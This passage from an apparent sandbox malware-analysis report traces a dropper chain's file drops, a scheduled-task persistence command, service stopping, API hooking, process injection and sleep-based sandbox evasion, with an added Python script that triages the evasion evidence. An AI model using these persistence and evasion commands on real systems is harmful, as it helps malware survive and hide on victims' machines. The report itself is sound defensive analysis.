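    return header + b"\0" * (0x200 - len(header)) + text_raw + cfg_raw + sec_raw


def summarize(pe: dict) -> list:
    lines = [f"Image base 0x{pe['image_base']:X}", ", ".join(pe["dll_characteristics"])]
    lines += [f"section name: {s['name']} entropy: {s['entropy']} ({classify_section(s)})" for s in pe["sections"]]
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(parse_pe(build_sample_pe()))))
```

The section names by themselves are weak evidence: .didat, .00cfg and _RDATA are what MSVC emits, and the PDB paths above show the outer layers are stock WinRAR SFX stubs. The entropy of 7.557 in the .text of the dropped payloads (hyperProviderSavesinto.exe, KZcLqgnLvRf.exe, RuntimeBroker.exe) is the signal worth keeping, since compiled code normally sits well below 7.0.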

                                Persistence and Installation Behavior

Source: C:\PerfDll\hyperProviderSavesinto.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (15 occurrences)
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | File created: C:\Users\user\Desktop\XVmuemSr.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | File created: C:\Users\user\Desktop\phOzxInG.log
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Users\user\Desktop\LugVktua.log
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | File created: C:\PerfDll\hyperProviderSavesinto.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | File created: C:\Users\user\Desktop\IkSFhrpY.log
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | File created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Recovery\WmiPrvSE.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Users\user\Desktop\kEwbgeKe.log
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Recovery\RuntimeBroker.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Users\user\Desktop\vsaRQqFM.log
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | File created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | File created: C:\Users\user\Desktop\KEMGRwnV.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | File created: C:\Users\user\Desktop\zQhPhksn.log
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | File created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Users\user\Desktop\msAjSsFc.log
Source: C:\PerfDll\hyperProviderSavesinto.exe | File created: C:\Users\user\Desktop\WiKMUFpI.log

                                Boot Survival

Source: C:\PerfDll\hyperProviderSavesinto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                                Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (86 occurrences)
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Process information set: NOOPENFILEERRORBOX (62 identical entries)
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Process information set: NOOPENFILEERRORBOX (92 identical entries)
                                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle | 46_2_00000001400010C0
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost (2 entries)
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Memory allocated: EC0000 memory reserve | memory write watch
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Memory allocated: 1ABB0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Memory allocated: 1350000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Memory allocated: 1AEE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Memory allocated: 2C10000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Memory allocated: 1AE00000 memory reserve | memory write watch
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Code function: 8_2_00007FFD9BC493F1 sldt word ptr [eax]
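The evasion indicators recorded in this section (a thread delay of 922337203685477 ms, a ten-minute run of shrinking delays, ping -n 10 localhost used as a sleep, a WMI Win32_VideoController query and an sldt probe) can be triaged mechanically rather than read line by line. The script below is an added example, not part of this report or of Joe Sandbox's own tooling: it parses lines in the report's "Source: process | behaviour" form (and the run-together form extraction produces), maps each to a technique label and weight of my own choosing, and summarises per process. The sample lines are copied from this report; the 922337203685477 value is recognised arithmetically as Int64.MaxValue ticks expressed in milliseconds, i.e. .NET TimeSpan.MaxValue, so the wait never times out.

```python
"""Triage the 'Malware Analysis System Evasion' evidence lines of a Joe Sandbox
report.  Added example; it is not part of the report or of Joe Sandbox.
Each 'Source: <process> | <behaviour>' line is mapped to the evasion technique
it implies and given a weight, so an analyst can see per process what the
sample does to stall or fingerprint the sandbox.  The sample lines below are
copied from this report; technique names and weights are my own assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10_000 ticks
# per ms.  A 'delay time' of this size is a wait that never times out.
DOTNET_MAX_DELAY_MS = (2**63 - 1) // 10_000  # 922337203685477


@dataclass(frozen=True)
class Finding:
    process: str    # image name of the acting process
    technique: str  # assumed technique label, not a Joe Sandbox signature name
    detail: str
    weight: int     # 0 = informational, 3 = strong evasion indicator


# Accepts both 'Source: x.exe | behaviour' and the run-together 'x.exebehaviour'.
_LINE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*(?P<rest>.+)$")


def parse_line(line: str) -> tuple[str, str] | None:
    """Split one evidence line into (process image name, behaviour text)."""
    m = _LINE.match(line.strip())
    if m is None:
        return None
    return m.group("src").rsplit("\\", 1)[-1], m.group("rest").strip()


def classify(line: str) -> Finding | None:
    """Map one evidence line to a Finding; None if the line is not evidence."""
    parsed = parse_line(line)
    if parsed is None:
        return None
    proc, rest = parsed
    if m := re.search(r"delay time:\s*(\d+)", rest):
        ms = int(m.group(1))
        if ms >= DOTNET_MAX_DELAY_MS:
            return Finding(proc, "sleep-evasion",
                           "wait with .NET TimeSpan.MaxValue (never times out)", 3)
        return Finding(proc, "sleep-evasion", f"thread sleeps {ms / 1000:.0f}s",
                       2 if ms >= 60_000 else 1)
    if m := re.search(r"ping\s+-n\s+(\d+)\s+localhost", rest, re.I):
        n = int(m.group(1))
        # ping sends one echo request per second; replies from localhost are
        # immediate, so N requests stall the calling script for about N-1 s.
        return Finding(proc, "sleep-evasion", f"ping -n {n} localhost stalls ~{n - 1}s", 2)
    if "WriteProcessMemory" in rest and re.search(r"NtCreateThreadEx|CreateRemoteThread", rest):
        return Finding(proc, "process-injection",
                       "VirtualAllocEx/WriteProcessMemory/remote thread chain", 3)
    if "Win32_VideoController" in rest:
        return Finding(proc, "vm-fingerprint", "GPU enumeration via WMI", 2)
    if re.search(r"\b(sldt|sidt|sgdt)\b", rest):
        return Finding(proc, "vm-fingerprint", "descriptor-table probe (Red Pill family)", 2)
    if "memory write watch" in rest:
        return Finding(proc, "write-watch-heap",
                       "MEM_WRITE_WATCH reservation (CLR GC heap; usable with GetWriteWatch)", 1)
    if "NOOPENFILEERRORBOX" in rest:
        return Finding(proc, "error-dialog-suppression",
                       "SetErrorMode(SEM_NOOPENFILEERRORBOX)", 0)
    return Finding(proc, "unclassified", rest, 0)


def triage(lines: list[str]) -> dict:
    """Classify every line; return the total score and techniques per process."""
    findings = [f for f in map(classify, lines) if f is not None]
    by_process: dict[str, set[str]] = {}
    for f in findings:
        if f.weight > 0:
            by_process.setdefault(f.process, set()).add(f.technique)
    return {
        "score": sum(f.weight for f in findings),
        "by_process": {p: sorted(t) for p, t in by_process.items()},
        "findings": findings,
    }


# Constructed from lines in this report (cleaned to 'Source: x | behaviour').
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,NtQueryInformationProcess,"
    r"GetTokenInformation,GetSidSubAuthority,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,CloseHandle",
    r"Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | "
    r"WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController",
    r"Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost",
    r"Source: C:\PerfDll\hyperProviderSavesinto.exe | Memory allocated: EC0000 memory reserve | memory write watch",
    r"Source: C:\PerfDll\hyperProviderSavesinto.exe | Code function: 8_2_00007FFD9BC493F1 sldt word ptr [eax]",
    r"Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | "
    r"Thread delayed: delay time: 922337203685477",
    r"Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | "
    r"Thread delayed: delay time: 600000",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for f in result["findings"]:
        print(f"[{f.weight}] {f.process:28} {f.technique:24} {f.detail}")
    print("score:", result["score"], "| per process:", result["by_process"])
```

The weights are deliberately coarse: the MEM_WRITE_WATCH reservations are what the CLR garbage collector does in every .NET process, so on their own they say little, while an infinite wait, a ten-minute sleep loop and a GPU query in a process dropped under Reference Assemblies are the entries worth an analyst's attention.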
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\PerfDll\hyperProviderSavesinto.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 599425
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 599292
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 599094
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 598729
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 598012
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597672
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597546
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597437
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597273
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597171
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 597056
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 596804
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 596662
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 596542
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 596434
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Thread delayed: delay time: 596327
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596218
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596108
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595890
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595781
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595628
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595515
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595406
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595296
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595187
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595077
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594968
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594859
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594750
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594638
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594530
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594421
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594311
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594203
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594093
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593875
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593765
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593656
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593465
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593324
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593216
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593099
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592979
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592867
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592762
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3989Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5804Jump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWindow / User API: threadDelayed 3527
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWindow / User API: threadDelayed 6318
                                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 8408
                                Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1449
                                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2545
                                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7455
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XVmuemSr.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\phOzxInG.log
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LugVktua.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IkSFhrpY.log
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kEwbgeKe.log
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vsaRQqFM.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KEMGRwnV.log
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zQhPhksn.log
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\msAjSsFc.log
Source: C:\PerfDll\hyperProviderSavesinto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WiKMUFpI.log
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\PING.EXE	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dialer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	API coverage: 5.0 %
Source: C:\Windows\System32\conhost.exe	API coverage: 4.7 %
Source: C:\Windows\System32\PING.EXE	API coverage: 5.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 3989 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep count: 5804 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\PerfDll\hyperProviderSavesinto.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep count: 105 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200	Thread sleep time: -105000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599812s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599425s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599292s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -599094s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598729s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598234s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598125s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -598012s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597672s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597546s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597437s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597273s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597171s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -597056s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596804s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596662s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596542s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596434s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596327s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596218s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596108s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -596000s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595890s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595781s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595628s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595515s >= -30000s
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744	Thread sleep time: -595406s >= -30000s
